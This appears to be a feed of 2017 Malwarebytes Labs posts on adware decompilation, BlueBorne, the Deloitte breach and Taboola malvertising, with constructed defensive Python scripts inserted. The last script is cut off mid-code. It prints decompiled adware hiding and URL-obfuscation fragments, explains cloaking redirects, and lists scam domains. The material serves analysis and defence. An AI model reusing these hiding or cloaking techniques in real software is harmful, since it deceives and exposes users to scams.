Techie Feeds

Using ILSpy to analyze a small adware file

Malwarebytes - Thu, 10/05/2017 - 16:19

My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called grandfather.exe, so I went out to grab a copy and have a look at it.

As you can probably tell from some of the detection names at VirusTotal, this is an MSIL (Microsoft Intermediate Language) file. There are a lot of tools to decompile MSIL executables, but ILSpy is my personal favorite. To demonstrate why, I will show you how I analyzed this very small executable, which is part of the Adware.Dotdo family.

Using ILSpy

Once you have downloaded and unzipped the binaries from their site, you can run ILSpy.exe and click File > Open to navigate to the file you would like to look at.

One advantage of ILSpy is that the code is shown in a very clear format. Even a basic ability to read pseudocode, plus knowing where to find the .NET documentation, will get you a long way, as I’m about to demonstrate.

The code in the example

Code is shown in C# format

In this code slice, where the most important part of the program is initialized, we see three methods of hiding the program parts from the user:

  • The program will not be shown in the taskbar
  • The opacity is set at 0% which means you will see right through it
  • And the program will not show any error prompts in case any script errors occur

By the way, if you are more comfortable coding or reading code in another language, you can set ILSpy to show the code in that format.

Code is shown in VB format

The strings in the code above have been obfuscated in a very simple way. Just enough to throw someone who is merely looking at strings off track.

After applying Replace("28851129", string.Empty), which is appended to all the strings in that part of the code, this is what’s left of the two functions that will later be used as event handlers:


Private Sub ie(sender As Object, e As EventArgs)
    Me.i.AllowNavigation = True
    ' navigates to the obfuscated URL (call not shown)
End Sub


The event handler above simply navigates to the obfuscated URL.


Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)
    If Me.i.Document.Title <> "searchbox" Then
        ' navigates to the obfuscated URL (call not shown)
    End If
End Sub


This event handler determines where the browser connects to, based on the title of the current document. If the title of the site does not match “searchbox” then it simply redirects the user to the URL that is obfuscated. If the title already is “searchbox” it will do nothing.
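The three hiding techniques listed earlier and the Replace-based string obfuscation are both easy to triage mechanically once you have the decompiled text. The following Python script is an added example written for this article, not code from the original post or from the adware sample: it runs over a constructed fragment written in the style of ILSpy’s VB output (the URLs in it are placeholders, not the sample’s real addresses), flags the property assignments that hide a window or browser control, and, instead of hard-coding "28851129", guesses the filler token as the digit run shared by most string literals. That guessing heuristic generalizes the Replace trick to other samples of the same kind and is my assumption, not something the post describes.

```python
"""Triage helpers for decompiled .NET adware source (added example).

The sample text below is constructed for the example; it imitates the
decompiled output ILSpy produces and is not the actual grandfather.exe code.
"""
import re
from collections import Counter
from typing import Optional

# Constructed decompiled fragment in the style of the VB output shown above.
DECOMPILED_SAMPLE = r'''
Private Sub InitializeComponent()
    Me.ShowInTaskbar = False
    Me.Opacity = 0.0
    Me.i.ScriptErrorsSuppressed = True
    Me.i.Visible = False
    Me.i.Navigate("htt28851129p://exam28851129ple.invalid/28851129start".Replace("28851129", String.Empty))
    Me.i.Navigate("http://ex28851129ample.invalid/search28851129box".Replace("28851129", String.Empty))
End Sub
'''

# Property assignments that hide a WinForms window or its browser control
# from the user. Each entry: (regex, what it means for the analyst).
HIDING_INDICATORS = [
    (re.compile(r"\.ShowInTaskbar\s*=\s*False", re.I), "window removed from the taskbar"),
    (re.compile(r"\.Opacity\s*=\s*0(\.0+)?\b"), "window fully transparent"),
    (re.compile(r"\.ScriptErrorsSuppressed\s*=\s*True", re.I), "browser script errors silenced"),
    (re.compile(r"\.Visible\s*=\s*False", re.I), "control hidden"),
]


def find_hiding_indicators(source: str) -> list[str]:
    """Return the human-readable meaning of every hiding technique found."""
    return [meaning for rx, meaning in HIDING_INDICATORS if rx.search(source)]


STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')


def string_literals(source: str) -> list[str]:
    """Collect all double-quoted literals from the decompiled text."""
    return STRING_LITERAL.findall(source)


def guess_filler(literals: list[str], min_len: int = 4) -> Optional[str]:
    """Guess the junk token spliced into strings: the digit run of at least
    min_len characters that appears in more than half of the literals.
    (Heuristic assumed for this example; the sample's token is fixed.)"""
    counts: Counter = Counter()
    for lit in literals:
        for run in set(re.findall(r"\d{%d,}" % min_len, lit)):
            counts[run] += 1
    if not counts:
        return None
    token, seen = max(counts.items(), key=lambda kv: (kv[1], len(kv[0])))
    return token if seen * 2 > len(literals) else None


def deobfuscate(literals: list[str], filler: str) -> list[str]:
    """Mirror the sample's own Replace(filler, String.Empty) step."""
    return [lit.replace(filler, "") for lit in literals]


URL = re.compile(r"^https?://\S+$", re.I)


def recovered_urls(source: str) -> list[str]:
    """End-to-end: literals -> filler guess -> cleaned strings that are URLs."""
    lits = string_literals(source)
    filler = guess_filler(lits)
    if filler is None:
        return []
    return [s for s in deobfuscate(lits, filler) if URL.match(s)]


if __name__ == "__main__":
    for hit in find_hiding_indicators(DECOMPILED_SAMPLE):
        print("hiding technique:", hit)
    print("filler token:", guess_filler(string_literals(DECOMPILED_SAMPLE)))
    for u in recovered_urls(DECOMPILED_SAMPLE):
        print("contacted URL:", u)
```

Run it against text you export from ILSpy (File > Save Code) to get the same three-step read: how the window is hidden, what the filler token is, and which URLs survive once the filler is stripped.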

This is where the browser control (‘this’) is initialized while the layout of the main Window (‘base’) is postponed until the browser is ready to go. All the control’s edges are docked to the edges of its containing control and sized appropriately. The browser will resize to fit all of the empty space in its parent container with the DockStyle.Fill property set.

Then the location, size, and name are set, but also the control is hidden by setting the “.visible” property to “false”.

When the new document is fully loaded, the DocumentCompleted event occurs, and the event handler is the (lightly) obfuscated function we discussed earlier, so that will be triggered.

The AutoScaleDimensions property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property will be set by the Windows Forms designer to the value your monitor is currently using. The “Font” is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.

Then after the browser control has been added to the base application, the first event handler is called which, as mentioned earlier, hides the main window and initializes the browser.


The “program” stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention of fetching further instructions. At the time of writing, the site contains two iframes connecting to videojelly[.]com and whos.amung[.]us, a visitor counter.

I tried to show why I like ILSpy as a tool to decompile .NET and browse the assembly.

The file we looked at has:

SHA-256: 53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240

Grandfather.exe is now detected as Adware.Dotdo.


Pieter Arntz

The post Using ILSpy to analyze a small adware file appeared first on Malwarebytes Labs.

Categories: Techie Feeds

National cybersecurity awareness month: simple steps for online safety

Malwarebytes - Mon, 10/02/2017 - 19:00

With each new devastating breach of security—Equifax, Deloitte, and Sonic, to name a few recent cyber fails—the need for increased cybersecurity awareness has never been more apparent. It’s a good thing, then, that this month is National Cybersecurity Awareness Month (NCSAM).

Observed every October since 2004, NCSAM was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. According to the Department of Homeland Security, NCSAM was designed to “engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the nation in the event of a cyber incident.”

NCSAM is broken down into weekly themes, including online safety for consumers, securing business networks, looking ahead to the security of future technologies, careers in cybersecurity, and securing infrastructure.

And now Malwarebytes is doing its part. Each week on Labs, we’ll focus on a theme and provide helpful articles, useful tips, and valuable analysis so that you can increase awareness and spread the word. This week’s theme: simple steps to online safety.

Week 1 of NCSAM features the STOP. THINK. CONNECT. campaign, which provides easy, actionable advice for safe surfing. STOP: make sure security measures are in place. THINK: about the consequences of your actions and behaviors online. CONNECT: and enjoy the Internet.

Sounds pretty simple, right? But what exactly does it mean? Here’s our interpretation.

Make sure security measures are in place

It’s often mind-numbing to think about all the things you should and shouldn’t be doing online. Here’s where you use technology to do the heavy lifting. Make sure you’ve got the following equipped on your home computer:

  • Firewall
  • Cybersecurity program that includes technology to block malware, ransomware, adware, and other advanced threats
  • Password manager
  • Wi-Fi secured with a password (for mobile devices/streaming)

To learn more about how to proactively protect against various forms of cybercrime, take a look at a few of our articles:

How to beat ransomware: prevent, don’t react

10 easy ways to prevent malware infection

Top 10 ways to secure your mobile phone

Why you don’t need 27 different passwords

With these in place, you can keep out a good chunk of the bad stuff, even if you “misbehave” online. However, human error still accounts for a lot of infections. So that’s why the next step is important.

Think about the consequences of your actions and behaviors online

Sure, you may have layers upon layers of security in place, and that’s going to help. But if you invite a criminal into your home, you’ve pretty much negated any security system you might have deployed. And that’s what happens when you ignore basic online hygiene.

To refresh your memory, there are a few things you need to keep an eye out for/be skeptical of:

  • Tech support scams (Microsoft won’t call you)
  • Phishing emails (is this really your bank asking you to update personal info?)
  • IRS phone calls/texts/emails (they mail you letters)
  • Online shopping on unsecured sites (look for the lock next to the URL)

We could go on, of course, but this general advice is good for all actions online: Does it seem too good to be true? If so, it probably is. Always treat information you encounter with a good sense of skepticism. And for more detailed advice, you can check out these Labs articles:

Tech support scams help and resource page

Something’s phishy: How to detect phishing attempts

Hacking your head: How cybercriminals use social engineering

Connect and enjoy the Internet

If you’re securing your home computer with the proper technologies and making cybersecurity awareness a priority (and if you’ve read this far, that means you are), then you can safely connect to the Internet and enjoy all the cat videos you want to your heart’s content. Sadly, there’s no such thing as being 100 percent secure—online or in life—but you can breathe easier knowing you’re doing the right things and acting responsibly.

Now onward! Go forth, spread the word, and stay tuned for NCSAM’s Week 2 theme: cybersecurity in the workplace is everyone’s business.

Happy surfing!

The post National cybersecurity awareness month: simple steps for online safety appeared first on Malwarebytes Labs.


A week in security (September 25 – October 01)

Malwarebytes - Mon, 10/02/2017 - 16:59

Recently, we talked about the hacking incident at Deloitte, one of the ‘big four’ global accounting firms. It was reported that client email addresses, usernames, and passwords were exposed. This also brought to light weaknesses in their policies and a lack of threat intelligence to recover leaked data. We advised Deloitte clients the following: do an inventory of email addresses used to correspond with the company, review network outbound traffic, determine what information might have leaked in the hack, and (more importantly) maintain security best practices to prevent hacks like this from happening again.

Patrick Wardle, an acclaimed security researcher, found a keychain vulnerability in High Sierra, Apple’s new macOS operating system. This revelation, unfortunately, spurred a lot of articles that one may deem as bordering on FUD (fear, uncertainty, doubt). So our resident Mac expert, Thomas Reed, set some records straight.

Senior Malware Analyst Nathan Collier likened BlueBorne, the new attack vector using Bluetooth technology, to influenza. First discovered by Armis Labs, BlueBorne can potentially affect billions of devices across multiple platforms. In the piece, Collier stressed the importance of Bluetooth security and agreed with Armis’s prediction that Bluetooth vulnerabilities would continue to be seen in the future.

Lastly, Lead Malware Intelligence Analyst Jérôme Segura discussed some discoveries last week about cryptocoin mining, malvertising, tech support scam, and targeted attacks.

Segura revealed a questionable trend on the rise in which website publishers mine for cryptocurrencies on user machines while visitors are on their sites. He also described a scenario in which mining is tied to malvertising. Separately, scammers abused Taboola, a global discovery platform, to redirect users from a promoted story to a tech support scam page.

Segura, together with David Sánchez, wrote about an espionage attack against the Saudi Arabian government, in an effort to let readers understand how the malware entered its target systems and kept in touch with its C&C.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Responsible Vulnerability Disclosure Is Becoming An International Norm. “More and more countries are joining the United States in adopting a policy of weighing the pros and cons of responsible vulnerability disclosure, as the public calls for more clarity regarding intelligence agencies and their supposed hoarding of previously undiscovered software flaws” (Source: Cyberscoop)
  • Mobile Stock Trading App Providers Unresponsive to Glaring Vulnerabilities. “Researchers from IOActive today published a report describing the scope of the security issues. More concerning, however, is the lack of response from the respective financial firms. Of the 21 apps in question, researcher Alejandro Hernandez said he sent detailed private disclosures to 13 brokerage firms and only two had acknowledged the reports as of Monday.” (Source: Threatpost)
  • XPCTRA Malware Steals Banking And Digital Wallet User’s Credentials. “The malspams used in the campaign try to induce the victim to open a supposed bank bill link. It actually leads to the download of the XPCTRA dropper, that is, the part of the malware responsible for environment recognition and downloading new components. Once executed, it initiates a connection with an Internet address to download other malware parts responsible for later malicious actions.” (Source: SANS Internet Storm Center)
  • Android Unlock Patterns Are A Boon For Shoulder Surfing Attackers. “The ‘swiping’ unlock patterns typical for Android devices are considerably easier for attackers to discern than PIN combinations. In fact, after only one observation of a user entering the pattern, 64% of shoulder surfing attackers will be able to reproduce it, a group of researchers from the US Naval Academy and the University of Maryland Baltimore County has found.” (Source: Help Net Security)
  • Police: Buying Fake Goods Online Can Lead to ID Theft. “The City of London Police has shut down 28,000 websites selling counterfeit goods over the past three years, many of which were registered with stolen identities, it has revealed. Over 4000 sites were created using the identities of unsuspecting members of the public, according to the force, which released the figures as part of a new awareness campaign.” (Source: Infosecurity Magazine)
  • No, Facebook Spies Aren’t Secretly ‘Following Me’, It’s A Hoax. “According to the nonsense debunkers over at Snopes, the hoax debuted in January 2017.” (Source: Sophos’s Naked Security Blog)
  • Sudden Rise Detected in Faceliker Malware That Manipulates Facebook ‘Likes’. “The Faceliker malware is not new, being spotted years back, and is a generic detection that describes malware that takes over users’ browsers and uses JavaScript code to perform click-jacking, giving Facebook “likes” to content received from a central command and control server.” (Source: Bleeping Computer)
  • Duo Security Discovers Apple Mac Computers Unprotected from Malicious Firmware Vulnerabilities. “The report shows Mac users who have updated to the latest operating system (OS) or downloaded the most recent security update may not be as secure as they originally thought. A Duo Labs analysis of over 73,000 real-world Mac systems gathered from users across industries found the Extensible Firmware Interface (EFI) in many popular Mac models was not actually receiving the security updates users thought. This left users susceptible to previously disclosed vulnerabilities such as Thunderstrike 2 and the recent WikiLeaks Vault 7 data dumps that detail attacks against firmware.” (Source: Duo Security)
  • Uber London Ban Sees Rise In Malicious Taxi Apps. “Security researchers have warned of a rise in malicious apps masquerading as legitimate taxi-hailing services, as cyber-criminals look to capitalize on Transport for London (TfL)’s recent decision to ban Uber.” (Source: Infosecurity Magazine)
Latest updates for Businesses
  • Criminal Hacking: Top Technology Risk To Health, Safety And Prosperity. “Americans believe criminal hacking into computer systems is now a top risk to their health, safety and prosperity. Criminal hacking, a new ESET survey finds, outranks other significant hazards, including climate change, nuclear power, hazardous waste, and government surveillance.” (Source: Help Net Security)
  • Three Out Of Four DDoS Attacks Target Multiple Vectors. “Three out of every four DDoS attacks employed blended, multi-vector approaches in the second quarter of 2017, according to Nexusguard. The quarterly report, which measured more than 8,300 attacks, demonstrated that hackers continued to rely on volumetric attacks to overwhelm system resources.” (Source: Help Net Security)
  • Why Your Business Must Care About Privacy. “The current conversation often pits privacy against security, both in consumer and enterprise settings. This is especially true in the debate over whether mobile encryption is essential for the average user. However, not wanting to have personal information shared, acted on, or used by anyone without permission should be seen as a universal right.” (Source: Dark Reading)
  • Shocker? Companies Still Unprepared To Deal With Ransomware. “Companies and government agencies are overwhelmed by frequent, severe ransomware attacks, which have now become the #1 cyber threat to organizations, according to Crowd Research Partners.” (Source: Help Net Security)
  • Healthcare Sector Reports Greatest Number Of Security Incidents. “McAfee Labs saw healthcare surpass public sector to report the greatest number of security incidents in Q2, while the Faceliker Trojan helped drive quarter’s 67% increase in new malware samples from the social media landscape.” (Source: Help Net Security)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (September 25 – October 01) appeared first on Malwarebytes Labs.


BlueBorne – Bluetooth’s airborne influenza

Malwarebytes - Fri, 09/29/2017 - 15:00

Armis Labs has discovered a new attack vector that targets any device with Bluetooth capability. This includes mobile, desktop, and IoT devices — roughly 8.2 billion devices in total. All major operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it consists of several vulnerabilities in Bluetooth implementations that open up the potential for an array of malicious attacks. Some of these, as stated by Armis, are:

  • Take control of devices
  • Access corporate data and networks
  • Break into secure networks that use air gap security measures
  • Spread malware to devices within range of an infected device

BlueBorne does not require Bluetooth devices to be paired to other devices to be exploited. Even worse, devices are susceptible even when Bluetooth is in non-discoverable mode.

The ease of exploitation

What exactly does it take to exploit these newly found Bluetooth vulnerabilities? As noted in the Armis Labs BlueBorne whitepaper, the first step is to steal the BD_ADDR (Bluetooth Device Address). This is a hardcoded 48-bit MAC address of the Bluetooth device. Stealing the BD_ADDR of a Bluetooth device, especially one set to non-discoverable, used to be considered a feat. With the introduction of new Bluetooth “sniffing” hardware, this has become a lot easier. One such device is the open-source Ubertooth, which plugs into a USB port of a computer. Simply be within range with the Ubertooth plugged in, and it will capture Bluetooth traffic from the air. With the help of some other monitoring tools to analyze the traffic — voilà — you have BD_ADDRs.

Spreading malware via Bluetooth

One of the more intriguing attacks is the potential to propagate malware using BlueBorne vulnerabilities. More specifically, through mobile devices.

The only way I could hypothesize this happening is through an attack using a list of collected BD_ADDRs and then creating a malicious app which scans for those addresses. Any device within range on the list becomes a target. Using the BlueBorne vulnerabilities to propagate itself, the malicious app transfers to the target device. Keep in mind the user of the target device would need to accept installing the malicious app as well.

All this isn’t impossible, but unlikely with the limitation of requiring a list of BD_ADDRs. Now if a mobile device could steal BD_ADDRs for itself — which it can’t at this point — then we should start worrying.

So how bad is it?

The work done by Armis Labs to present the BlueBorne vulnerabilities is extremely valuable to the security industry. It highlights the need for improved Bluetooth security. I applaud them for their hard work in this endeavor.

The introduction of sniffing hardware like Ubertooth and the creation of other open-source tools to analyze the collected traffic, like Kismet, have taken down the toughest barrier for hackers — collecting the BD_ADDR. With this exposure, I agree with Armis Labs’ prediction — we will continue to see more Bluetooth vulnerabilities arise.

The requirement of having to be within Bluetooth range is a limitation of BlueBorne. I believe this limitation will isolate it to more targeted attacks — most likely against specific companies. Even in that scenario, a spear phishing attack would be much easier to carry out and wouldn’t require being physically within Bluetooth range. Therefore, I’m skeptical that we will see BlueBorne implemented in a real-world attack.

Disabling Bluetooth

Bluetooth, by default, is enabled. If you don’t use Bluetooth, i.e., you don’t have any devices paired, it’s best to disable it. If you do use Bluetooth, disabling it when not in use is the most secure option against BlueBorne. However, many people use their mobile devices to pair with their vehicle’s hands-free unit. Ideally, remembering to enable/disable Bluetooth depending on whether you’re driving or not is the best option. Less ideal and more likely, you will forget to enable Bluetooth before starting to drive — myself included. Therefore, you have to weigh which is more of a threat: a BlueBorne attack, or looking at your phone to enable Bluetooth WHILE driving? Just something to think about.

The post BlueBorne – Bluetooth’s airborne influenza appeared first on Malwarebytes Labs.


Deloitte breached by hackers for months

Malwarebytes - Thu, 09/28/2017 - 16:00

On September 25, 2017, Deloitte announced that they detected a breach of the firm’s global email server via a poorly secured admin email in March of this year. Further, the attackers most likely had control of the server since November of 2016. Deloitte’s initial statement indicated that only six of their consultancy clients were impacted by the breach, but insider sources later disclosed to the media that the attack most likely compromised every admin account at the firm. The startling severity of the breach has brought attention to Deloitte’s other cybersecurity practices, which, as we can see here with a likely Active Directory server, are not ideal. (There are valid applications for self-signed certificates, but the larger problem here is that the server is exposed to the outside internet at all, running unnecessary services.)

An admin account compromise is not very shocking, given that a significant number of Deloitte email accounts can be found on paste sites, most of low complexity, suggesting the firm has minimal password policies and lacks a threat intelligence capacity to identify and recover leaked PII. A quick scan of showed a significant amount of Deloitte data from various locations, going back five years. A portion of those pastes were email credentials – the primary breach vector – as shown below.

What you should do if you’re a Deloitte cybersecurity client
  • First and foremost, take a quick inventory of your own corporate email accounts that have corresponded with the company. Accounts with normal network privileges could benefit from a password reset. Those with elevated privileges should be reviewed for accesses and unusual activity. It’s not unheard of for attackers to breach an ancillary services firm in furtherance of an attack on the main target.
  • Do Deloitte consultants have accounts on your network? You can review outbound traffic on these hosts to make sure it matches with their work role.
  • Maintain your own threat intelligence capacity to identify work product that might be leaked on paste sites. Enormous breaches like this one are quickly monetized on the dark web, with data eventually filtering out for public use. You can’t prevent third party access to your data, but you can find it in a timely manner, and serve a takedown request accordingly.
  • Don’t repeat their mistakes. Best practices for enterprise security are widely written about and publicly available. While security is generally seen as a cost center, it would be more accurate to describe it as an investment in public trust. And without trust, how profitable could your enterprise possibly be?
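The first two items above (inventory the accounts that corresponded with the vendor, then review outbound traffic from consultant hosts against their work role) can be run as a repeatable triage rather than a one-off manual check. The Python below is an added example, not code from the Malwarebytes post: the mail log, directory, connection records and allowlists are all constructed for the example, and the domain names and IPs are placeholders.

```python
"""Third-party breach triage (added example, not from the Malwarebytes post).

Two checks from the advice above, run over constructed sample data:
  1. inventory internal accounts that corresponded with the vendor's domain
     and sort them into 'reset' (normal privilege) vs 'review' (elevated);
  2. flag outbound connections from vendor-consultant hosts that fall
     outside the destinations their work role is expected to use.
"""
from collections import defaultdict

VENDOR_DOMAIN = "vendor.example"   # placeholder for the breached vendor

# Constructed mail-log records: (sender, recipient) pairs.
MAIL_LOG = [
    ("alice@corp.example", "consultant1@vendor.example"),
    ("bob@corp.example", "consultant1@vendor.example"),
    ("admin.carol@corp.example", "partner@vendor.example"),
    ("dave@corp.example", "friend@other.example"),
    ("consultant1@vendor.example", "erin@corp.example"),
]

# Constructed directory extract: account -> privilege level.
DIRECTORY = {
    "alice@corp.example": "user",
    "bob@corp.example": "user",
    "admin.carol@corp.example": "admin",
    "dave@corp.example": "user",
    "erin@corp.example": "admin",
}


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower()


def vendor_correspondents(mail_log, vendor_domain=VENDOR_DOMAIN):
    """Internal accounts that sent mail to or received mail from the vendor."""
    found = set()
    for sender, recipient in mail_log:
        if domain_of(recipient) == vendor_domain and domain_of(sender) != vendor_domain:
            found.add(sender)
        if domain_of(sender) == vendor_domain and domain_of(recipient) != vendor_domain:
            found.add(recipient)
    return sorted(found)


def triage_accounts(accounts, directory):
    """Normal accounts get a password reset; elevated ones get an access review."""
    plan = {"reset": [], "review": []}
    for acct in accounts:
        bucket = "review" if directory.get(acct) == "admin" else "reset"
        plan[bucket].append(acct)
    return plan


# Constructed outbound-connection records from consultant-assigned hosts:
# (host, destination, port). 203.0.113.0/24 is documentation address space.
OUTBOUND = [
    ("cons-laptop-01", "git.corp.example", 443),
    ("cons-laptop-01", "vpn.vendor.example", 443),
    ("cons-laptop-01", "203.0.113.7", 8443),
    ("cons-laptop-02", "git.corp.example", 443),
]

# Destinations each consultant host is expected to reach for its work role.
ROLE_ALLOWLIST = {
    "cons-laptop-01": {"git.corp.example", "vpn.vendor.example"},
    "cons-laptop-02": {"git.corp.example"},
}


def unexpected_outbound(records, allowlist):
    """Connections from consultant hosts to destinations outside their allowlist."""
    hits = defaultdict(list)
    for host, dest, port in records:
        if dest not in allowlist.get(host, set()):
            hits[host].append((dest, port))
    return dict(hits)


if __name__ == "__main__":
    accts = vendor_correspondents(MAIL_LOG)
    print("triage plan:", triage_accounts(accts, DIRECTORY))
    print("unexpected outbound:", unexpected_outbound(OUTBOUND, ROLE_ALLOWLIST))
```

The split into "reset" and "review" mirrors the advice above: a forced reset is cheap for ordinary accounts, while elevated accounts deserve a look at what they accessed before their credentials are rotated.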

Third-party breaches are occurring at an accelerating rate. While outsourcing data security to a popular vendor checks off the “security box,” there is no good substitution for in-house expertise that knows the business as well as security. Good security now is an investment in stable capital growth later. Building in-house talent to facilitate that growth can put you ahead of the curve before the next breach happens.

The post Deloitte breached by hackers for months appeared first on Malwarebytes Labs.


Tech support scammers abuse native ad and content provider Taboola to serve malvertising

Malwarebytes - Thu, 09/28/2017 - 14:58

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on MSN, the Microsoft web portal that attracts millions of unique visitors. While clicking on a story promoted by Taboola – a leading global discovery platform with which Microsoft signed a deal in 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page
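The traffic shown in Figures 2 and 4 is a short redirect chain: the click on the promoted story, a temporary hop through the decoy site, and the 302 onto the scam page. Reconstructing that chain from a proxy log and flagging the hops where the registrable domain changes is a useful routine check. The Python below is an added example, not code from the Malwarebytes post: the log lines are constructed in a simple space-separated format, and the domain names are placeholders standing in for the sites described above.

```python
"""Reconstruct a malvertising redirect chain from proxy log lines
(added example, not from the Malwarebytes post).

Constructed log format, one request per line:
    timestamp method url status location   ('-' when no Location header)
"""
import re
from urllib.parse import urlparse

# Constructed proxy log: a click on a promoted story, a temporary hop
# through a decoy "news" site, and a 302 onto the scam page.
PROXY_LOG = """\
2017-09-27T10:00:01Z GET https://news-portal.example/story/123 200 -
2017-09-27T10:00:02Z GET https://trc.ads-network.example/click?id=42 302 https://decoy-news.example/breaking/big-story
2017-09-27T10:00:03Z GET https://decoy-news.example/breaking/big-story 302 https://scam-landing.example/alert.php
2017-09-27T10:00:04Z GET https://scam-landing.example/alert.php 200 -
2017-09-27T10:00:05Z GET https://scam-landing.example/static/siren.mp3 200 -
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (\S+)$")


def parse_log(text):
    """Return (url, status, location) tuples; location is None when absent."""
    out = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip lines that do not fit the expected format
        _ts, _method, url, status, loc = m.groups()
        out.append((url, int(status), None if loc == "-" else loc))
    return out


def registrable(url):
    """Crude registrable-domain helper: last two labels of the host.
    Good enough for the placeholder names here; use a public-suffix
    library for real data."""
    host = urlparse(url).hostname or ""
    return ".".join(host.split(".")[-2:])


def redirect_chain(entries):
    """Follow 3xx Location headers starting at the first redirecting request."""
    chain = []
    pending = None
    for url, status, loc in entries:
        if pending is not None and url != pending:
            continue  # unrelated request while a redirect is outstanding
        if pending is None and not (300 <= status < 400):
            continue  # the chain starts at the first redirect
        chain.append(url)
        pending = loc if 300 <= status < 400 else None
        if pending is None:
            break  # a non-redirect response ends the chain
    return chain


def cross_domain_hops(chain):
    """Hops where the registrable domain changes: the hand-offs of interest."""
    return [(a, b) for a, b in zip(chain, chain[1:]) if registrable(a) != registrable(b)]


def landing_domain(chain):
    """Where the user actually ended up."""
    return registrable(chain[-1]) if chain else None


if __name__ == "__main__":
    chain = redirect_chain(parse_log(PROXY_LOG))
    for hop in cross_domain_hops(chain):
        print("cross-domain hop:", hop[0], "->", hop[1])
    print("landing domain:", landing_domain(chain))
```

Two cross-domain hops in a row, with the middle one landing on a site that never gets rendered, is exactly the shape the post calls a temporary hop via a decoy; the check is cheap enough to run over every promoted-content click in a proxy log.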

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Domain Name: INFINITYMEDIA.ONLINE
Creation Date: 2017-05-23T05:14:50.0Z
Registrar: PDR Ltd. d/b/a
Registrant Name: bhanu
Registrant Country: IN
Registrant Email:

A cursory review using RiskIQ’s PassiveTotal of recently created domains using the same email address shows a tendency for this actor to register tech support scams domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we don’t have a clear connection to 4vxadfcjdgbcmn[.]ga, which does not have an identifiable registrant. Indeed, the .GA Top Level Domain (TLD) consists of free domain names, and their registrant is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same host server for domains he had created before. For example, if we take micro-soft-system-alert2[.]online which is registered to his email address, we notice that it resolves to, a server full of tech support scams and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain

Further inspection of other properties tied to shows similar bogus ‘news’ sites:

hollywoodreporter[.]online
latestnynews[.]online
theonlytimesnews[.]xyz
uk-times-news[.]xyz
unitedtimesnews[.]xyz
247breakingnews[.]xyz
247-breakingnews[.]xyz
thenewyorktimenews[.]xyz

There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.
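The pivot performed above is a small graph walk: the scam domain has no usable registrant, but it shares a hosting IP with a domain that does, and that registrant email leads back to the decoy news sites. The Python below is an added example, not code from the Malwarebytes post or from RiskIQ’s PassiveTotal: it builds a graph from constructed WHOIS and passive-DNS records (placeholder domains, documentation IPs and a placeholder email address, not the real indicators from the investigation) and walks it from the scam domain to recover the linked decoys together with the path that links each one.

```python
"""Infrastructure pivot: link a scam domain to decoy 'news' sites through
shared registrant e-mail and shared hosting IP (added example, not from
the post). All records are constructed placeholders.
"""
from collections import deque

# Constructed WHOIS data: domain -> registrant e-mail (None = unknown, as
# with the free .ga domain in the post).
WHOIS = {
    "decoy-news.example": "registrant@mail.invalid",
    "fake-alert2.example": "registrant@mail.invalid",
    "another-news.example": "registrant@mail.invalid",
    "scam-landing.example": None,
    "unrelated-shop.example": "shop@mail.invalid",
}

# Constructed passive DNS: domain -> set of IPs it has resolved to.
PDNS = {
    "decoy-news.example": {"198.51.100.10"},
    "fake-alert2.example": {"203.0.113.5"},
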